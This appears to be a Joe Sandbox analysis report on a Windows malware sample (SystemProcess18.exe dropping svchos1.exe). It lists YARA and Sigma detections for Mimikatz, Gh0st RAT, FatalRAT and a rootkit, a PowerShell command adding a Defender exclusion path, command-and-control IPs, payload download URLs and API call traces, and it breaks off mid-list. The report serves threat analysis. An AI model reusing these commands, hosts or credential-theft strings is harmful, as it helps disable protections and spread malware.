28.2.svchos1.exe.357d6bc.3.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x8712:$h1: Hid_State 0x1ac78:$h1: Hid_State 0x8726:$h2: Hid_StealthMode 0x1ac98:$h2: Hid_StealthMode 0x8746:$h3: Hid_HideFsDirs 0x1acb8:$h3: Hid_HideFsDirs 0x8764:$h4: Hid_HideFsFiles 0x1acd8:$h4: Hid_HideFsFiles 0x8784:$h5: Hid_HideRegKeys 0x1acf8:$h5: Hid_HideRegKeys 0x87a4:$h6: Hid_HideRegValues 0x1ad18:$h6: Hid_HideRegValues 0x87c8:$h7: Hid_IgnoredImages 0x1ad48:$h7: Hid_IgnoredImages 0x87ec:$h8: Hid_ProtectedImages 0x1ad78:$h8: Hid_ProtectedImages 0xd02e:$s1: FLTMGR.SYS 0x209a2:$s1: FLTMGR.SYS 0xd5aa:$s2: HAL.dll 0xa14e:$s3: \SystemRoot\System32\csrss.exe 0x1c8f8:$s3: \SystemRoot\System32\csrss.exe
28.2.svchos1.exe.36bcd38.5.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.36bcd38.5.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x24104:$x4: Http/1.1 403 Forbidden 0x24104:$s5: Http/1.1 403 Forbidden
28.2.svchos1.exe.36bcd38.5.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x240bb:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.36bcd38.5.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x8712:$h1: Hid_State 0x1ac78:$h1: Hid_State 0x8726:$h2: Hid_StealthMode 0x1ac98:$h2: Hid_StealthMode 0x8746:$h3: Hid_HideFsDirs 0x1acb8:$h3: Hid_HideFsDirs 0x8764:$h4: Hid_HideFsFiles 0x1acd8:$h4: Hid_HideFsFiles 0x8784:$h5: Hid_HideRegKeys 0x1acf8:$h5: Hid_HideRegKeys 0x87a4:$h6: Hid_HideRegValues 0x1ad18:$h6: Hid_HideRegValues 0x87c8:$h7: Hid_IgnoredImages 0x1ad48:$h7: Hid_IgnoredImages 0x87ec:$h8: Hid_ProtectedImages 0x1ad78:$h8: Hid_ProtectedImages 0xd02e:$s1: FLTMGR.SYS 0x209a2:$s1: FLTMGR.SYS 0xd5aa:$s2: HAL.dll 0xa14e:$s3: \SystemRoot\System32\csrss.exe 0x1c8f8:$s3: \SystemRoot\System32\csrss.exe
28.2.svchos1.exe.358cd04.1.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.358cd04.1.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x14abc:$x4: Http/1.1 403 Forbidden 0x14abc:$s5: Http/1.1 403 Forbidden
28.2.svchos1.exe.358cd04.1.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x14a73:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.358cd04.1.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xb630:$h1: Hid_State 0xb650:$h2: Hid_StealthMode 0xb670:$h3: Hid_HideFsDirs 0xb690:$h4: Hid_HideFsFiles 0xb6b0:$h5: Hid_HideRegKeys 0xb6d0:$h6: Hid_HideRegValues 0xb700:$h7: Hid_IgnoredImages 0xb730:$h8: Hid_ProtectedImages 0x1135a:$s1: FLTMGR.SYS 0xd2b0:$s3: \SystemRoot\System32\csrss.exe 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
28.2.svchos1.exe.36cc380.4.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.36cc380.4.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x14abc:$x4: Http/1.1 403 Forbidden 0x14abc:$s5: Http/1.1 403 Forbidden
28.2.svchos1.exe.36cc380.4.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x14a73:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.36cc380.4.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xb630:$h1: Hid_State 0xb650:$h2: Hid_StealthMode 0xb670:$h3: Hid_HideFsDirs 0xb690:$h4: Hid_HideFsFiles 0xb6b0:$h5: Hid_HideRegKeys 0xb6d0:$h6: Hid_HideRegValues 0xb700:$h7: Hid_IgnoredImages 0xb730:$h8: Hid_ProtectedImages 0x1135a:$s1: FLTMGR.SYS 0xd2b0:$s3: \SystemRoot\System32\csrss.exe 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
29.2.svchos1.exe.2980984.2.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
29.2.svchos1.exe.2980984.2.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
29.2.svchos1.exe.2980984.2.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
29.2.svchos1.exe.2980984.2.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x120df3:$x1: sekurlsa::logonpasswords
29.2.svchos1.exe.2980984.2.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x10544a:$h1: Hid_State 0x1179b0:$h1: Hid_State 0x10545e:$h2: Hid_StealthMode 0x1179d0:$h2: Hid_StealthMode 0x10547e:$h3: Hid_HideFsDirs 0x1179f0:$h3: Hid_HideFsDirs 0x10549c:$h4: Hid_HideFsFiles 0x117a10:$h4: Hid_HideFsFiles 0x1054bc:$h5: Hid_HideRegKeys 0x117a30:$h5: Hid_HideRegKeys 0x1054dc:$h6: Hid_HideRegValues 0x117a50:$h6: Hid_HideRegValues 0x105500:$h7: Hid_IgnoredImages 0x117a80:$h7: Hid_IgnoredImages 0x105524:$h8: Hid_ProtectedImages 0x117ab0:$h8: Hid_ProtectedImages 0x109d66:$s1: FLTMGR.SYS 0x11d6da:$s1: FLTMGR.SYS 0x10a2e2:$s2: HAL.dll 0x106e86:$s3: \SystemRoot\System32\csrss.exe 0x119630:$s3: \SystemRoot\System32\csrss.exe
29.2.svchos1.exe.2980984.2.unpack	MALWARE_Win_FatalRAT	Detects FatalRAT	ditekSHen	0xfb360:$s1: CHROME_NO_DATA 0xfb350:$s2: CHROME_UNKNOW 0xfc1b4:$s4: InetCpl.cpl,ClearMyTracksByProcess 0xfc254:$s7: del /s /f %appdata%\Mozilla\Firefox 0xfb388:$s9: fnGetChromeUserInfo
28.2.svchos1.exe.3480984.2.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
28.2.svchos1.exe.3480984.2.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
28.2.svchos1.exe.3480984.2.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.3480984.2.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x120df3:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.3480984.2.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x10544a:$h1: Hid_State 0x1179b0:$h1: Hid_State 0x10545e:$h2: Hid_StealthMode 0x1179d0:$h2: Hid_StealthMode 0x10547e:$h3: Hid_HideFsDirs 0x1179f0:$h3: Hid_HideFsDirs 0x10549c:$h4: Hid_HideFsFiles 0x117a10:$h4: Hid_HideFsFiles 0x1054bc:$h5: Hid_HideRegKeys 0x117a30:$h5: Hid_HideRegKeys 0x1054dc:$h6: Hid_HideRegValues 0x117a50:$h6: Hid_HideRegValues 0x105500:$h7: Hid_IgnoredImages 0x117a80:$h7: Hid_IgnoredImages 0x105524:$h8: Hid_ProtectedImages 0x117ab0:$h8: Hid_ProtectedImages 0x109d66:$s1: FLTMGR.SYS 0x11d6da:$s1: FLTMGR.SYS 0x10a2e2:$s2: HAL.dll 0x106e86:$s3: \SystemRoot\System32\csrss.exe 0x119630:$s3: \SystemRoot\System32\csrss.exe
28.2.svchos1.exe.3480984.2.unpack	MALWARE_Win_FatalRAT	Detects FatalRAT	ditekSHen	0xfb360:$s1: CHROME_NO_DATA 0xfb350:$s2: CHROME_UNKNOW 0xfc1b4:$s4: InetCpl.cpl,ClearMyTracksByProcess 0xfc254:$s7: del /s /f %appdata%\Mozilla\Firefox 0xfb388:$s9: fnGetChromeUserInfo
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Documents\MM\svchos1.exe, CommandLine: C:\Users\Public\Documents\MM\svchos1.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\MM\svchos1.exe, NewProcessName: C:\Users\Public\Documents\MM\svchos1.exe, OriginalFileName: C:\Users\Public\Documents\MM\svchos1.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\Public\Documents\MM\svchos1.exe, ProcessId: 3400, ProcessName: svchos1.exe

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\Public\Documents\MM\svchos1.exe, ParentImage: C:\Users\Public\Documents\MM\svchos1.exe, ParentProcessId: 3400, ParentProcessName: svchos1.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 1388, ProcessName: powershell.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SystemProcess18.exe", ParentImage: C:\Users\user\Desktop\SystemProcess18.exe, ParentProcessId: 7464, ParentProcessName: SystemProcess18.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7660, ProcessName: powershell.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7456, TargetFilename: C:\Users\Public\Documents\MM

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 38.46.13.66, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\SystemProcess18.exe, Initiated: true, ProcessId: 7464, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49700

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SystemProcess18.exe", ParentImage: C:\Users\user\Desktop\SystemProcess18.exe, ParentProcessId: 7464, ParentProcessName: SystemProcess18.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7660, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SystemProcess18.exe", ParentImage: C:\Users\user\Desktop\SystemProcess18.exe, ParentProcessId: 7464, ParentProcessName: SystemProcess18.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7660, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T22:30:14.492378+0100	2028371	3	Unknown Traffic	192.168.2.6	49693	113.142.77.41	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txt	Avira URL Cloud: Label: malware
Source: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Documents\MM\svchos1.exe

ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: SystemProcess18.exe	Virustotal: Detection: 50%			Perma Link
Source: SystemProcess18.exe	ReversingLabs: Detection: 41%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: SystemProcess18.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49698 version: TLS 1.2

Source: SystemProcess18.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\ZZ\Desktop\RpcTsch\Release\RpcTsch.pdb source: SystemProcess18.exe, SystemProcess18.exe, 00000000.00000003.1485028271.0000000003DE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\zz\Desktop\CCCC\Release\CCCC.pdb source: SystemProcess18.exe, 00000000.00000000.1226278101.00000000001C6000.00000002.00000001.01000000.00000003.sdmp, SystemProcess18.exe, 00000003.00000000.1266376609.00000000001C6000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: \Release\Dll1.pdb source: svchos1.exe

Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: c:
Source: C:\Users\user\Desktop\SystemProcess18.exe	File opened: [:	Jump to behavior

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006E6AD8 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	28_2_006E6AD8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035EB250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,	28_2_035EB250
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C92B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	28_2_035C92B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C9090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	28_2_035C9090
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C97D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	28_2_035C97D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C9B60 FindFirstFileA,FindClose,FindClose,	28_2_035C9B60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035CBD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	28_2_035CBD60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C9C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,	28_2_035C9C40
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006E6AD8 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	29_2_006E6AD8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_010529AD FindFirstFileExW,	29_2_010529AD
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030AB250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,	29_2_030AB250
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030892B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	29_2_030892B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03089090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	29_2_03089090
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030897D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	29_2_030897D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03089B60 FindFirstFileA,FindClose,FindClose,	29_2_03089B60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0308BD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	29_2_0308BD60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03089C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,	29_2_03089C40

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035C8E60 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlen,lstrlen,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen,

28_2_035C8E60

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push esi	28_2_03498938
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then sub esp, 0000009Ch	28_2_0348F35C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	28_2_034AF0F4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push ebp	28_2_0349561D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push esi	28_2_0349581E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	28_2_035EE770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then sub esp, 0000009Ch	29_2_0298F35C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	29_2_029AF0F4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push ebp	29_2_0299561D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push esi	29_2_0299581E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push esi	29_2_02998938
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	29_2_030AE770

Source: global traffic

TCP traffic: 192.168.2.6:49700 -> 38.46.13.66:8080

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49693 -> 113.142.77.41:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035ED3C0 _snprintf,recv,CreateThread,CloseHandle,recv,CreateThread,CloseHandle,Sleep,closesocket,

28_2_035ED3C0

Source: global traffic	HTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741854013752/4.txt HTTP/1.1Connection: Keep-AliveUser-Agent: MyApp/1.0Host: fs-im-kefu.7moor-fs1.com
Source: global traffic	HTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt HTTP/1.1User-Agent: DownloadAppHost: fs-im-kefu.7moor-fs1.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txt HTTP/1.1User-Agent: DownloadAppHost: fs-im-kefu.7moor-fs1.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: fs-im-kefu.7moor-fs1.com
Source: global traffic	DNS traffic detected: DNS query: xiaobaituzi.com

Source: powershell.exe, 00000010.00000002.1341669860.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1377034169.0000000007811000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1430682426.0000000006C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000A.00000002.1343846433.000000000572A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1353874119.00000000060DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.1414449184.0000000005275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.1339125174.0000000004817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1343464862.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1398898419.00000000047B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1414449184.000000000531F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000A.00000002.1339125174.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1343464862.0000000005071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1398898419.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1339125174.0000000004817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1343464862.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1398898419.00000000047B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1414449184.000000000531F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000015.00000002.1414449184.0000000005275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1339125174.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1343464862.0000000005071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1398898419.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: SystemProcess18.exe, 00000003.00000003.1596189606.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1596189606.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1623853815.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.0000000000926000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1623853815.0000000000926000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 